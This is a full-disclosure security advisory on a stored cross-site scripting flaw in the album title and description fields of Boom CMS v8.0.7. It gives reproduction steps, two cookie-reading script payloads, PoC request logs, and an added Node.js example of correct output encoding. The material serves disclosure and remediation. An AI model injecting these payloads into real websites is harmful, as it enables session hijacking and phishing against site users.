List:       full-disclosure
Subject:    [FD] Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
From:       "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date:       2023-07-19 7:06:38
Message-ID: d6f9c1ed-a827-36fc-037c-487f5c15a06c () vulnerability-lab ! com

Document Title:
===============
Boom CMS v8.0.7 - Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2274


Release Date:
=============
2023-07-03


Vulnerability Laboratory ID (VL-ID):
====================================
2274


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge.

(Copy of the Homepage: https://www.boomcms.net/boom-boom)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Boom CMS v8.0.7 web-application.


Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side.

The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add their own malformed albums with malicious script code in the title and description. After the injection, the albums are displayed in the backend, where the execution takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method used to inject is POST. The validation attempts to parse the content by escaping with a backslash. This has no impact on the injection of malicious JavaScript, because the escaping is only performed for double and single quotes to prevent SQL injection.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] assets-manager (album)

Vulnerable Function(s):
[+] add

Vulnerable Parameter(s):
[+] title
[+] description

Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability, follow the provided information and steps below.


Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduction of the persistent cross site web vulnerability!


Payload(s):
> <script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>


--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin: https://localhost:8000
Connection: keep-alive
Referer: https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-


Vulnerable Source: asset-manager/albums/[ID]

<li data-album="36">
         <a href="#albums/20">
             <div>
                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
                 <p class="description">"&gt;<[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
                 <p class='count'><span>0</span> assets</p>
             </div>
         </a>
     </li>
</iframe></p></div></a></li></ul></div></div>
         </div>

         <div id="b-assets-view-asset-container"></div>
         <div id="b-assets-view-selection-container"></div>
         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
         <div class="heading">
             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
         </div>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable title and description parameters. Restrict the input fields and disallow the use of special characters. Sanitize the output listing location to prevent further attacks.
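As an added example (not code from Boom CMS, UXB London or Vulnerability Lab), the following Node.js script contrasts the quote-only backslash escaping described in the Technical Details section with HTML entity encoding of the title and description at the output location shown in the Vulnerable Source section. The album record, the escaping and rendering functions, the 255-character length limit and the tag-count check are all constructed for this illustration and are not Boom CMS internals.

```javascript
// Added example, not code from Boom CMS or Vulnerability Lab. It contrasts the
// quote-only backslash escaping the advisory describes with HTML entity
// encoding of the album title and description at the output location, using
// a constructed album record shaped like the PUT body in the PoC logs.

// Constructed sample input; the bracketed placeholder string is the one the
// advisory uses, not a live payload. The description only carries the
// characters that matter for HTML context (quote, angle brackets, ampersand).
const SAMPLE_ALBUM = {
  id: 35,
  name: '"><[INJECTED SCRIPT CODE PAYLOAD 1!]>',
  description: "Summer '21 <photos> & more",
  asset_count: 0,
};

// The ineffective validation as the advisory describes it: only double and
// single quotes are backslash-escaped (an SQL-style escape). Angle brackets
// and ampersands pass through untouched, so markup still lands in the page.
function escapeQuotesOnly(value) {
  return String(value).replace(/["']/g, (q) => '\\' + q);
}

// Context-aware encoding for HTML element content and attribute values:
// every character that can start or end markup becomes an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Optional input-side restriction, as the advisory also suggests: reject
// titles that carry angle brackets or exceed an assumed 255-character limit.
// Output encoding above is the primary control; this only reduces what
// reaches the database.
function validateAlbumName(name) {
  const s = String(name);
  if (s.length === 0 || s.length > 255) return false;
  return !/[<>]/.test(s);
}

// Renders the album list item from the advisory's "Vulnerable Source"
// section with whichever escaper is supplied.
function renderAlbumItem(album, esc) {
  return [
    `<li data-album="${esc(album.id)}">`,
    `  <a href="#albums/${esc(album.id)}">`,
    '    <div>',
    `      <h3>${esc(album.name)}</h3>`,
    `      <p class="description">${esc(album.description)}</p>`,
    `      <p class="count"><span>${esc(album.asset_count)}</span> assets</p>`,
    '    </div>',
    '  </a>',
    '</li>',
  ].join('\n');
}

// The template itself contributes a fixed number of '<' characters; any
// extra one in rendered output came from an untrusted field.
const EMPTY_ALBUM = { id: 0, name: '', description: '', asset_count: 0 };
const TEMPLATE_TAG_COUNT = (renderAlbumItem(EMPTY_ALBUM, String).match(/</g) || []).length;

function leaksMarkup(html) {
  return (html.match(/</g) || []).length > TEMPLATE_TAG_COUNT;
}

// Renders the sample album both ways and reports whether raw markup survived.
function demo() {
  const weak = renderAlbumItem(SAMPLE_ALBUM, escapeQuotesOnly);
  const fixed = renderAlbumItem(SAMPLE_ALBUM, escapeHtml);
  return { weakLeaks: leaksMarkup(weak), fixedLeaks: leaksMarkup(fixed), fixed };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('quote-only escaping leaks markup:', r.weakLeaks); // true
  console.log('entity encoding leaks markup:   ', r.fixedLeaks); // false
  console.log(r.fixed);
}
```

Run with node. The quote-only variant lets `<` and `>` through unchanged, so the h3 and p elements still receive markup exactly as the Vulnerable Source section shows, while the entity-encoded variant renders the same strings as inert text. For a Laravel application (the PoC logs show a laravel_session cookie) the same rule at template level is to emit these fields through Blade's escaped `{{ }}` syntax rather than the unescaped `{!! !!}` form, and to apply the same encoding wherever the backend JavaScript inserts the album name and description into the DOM.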


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com | www.vuln-lab.com | www.vulnerability-db.com

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE



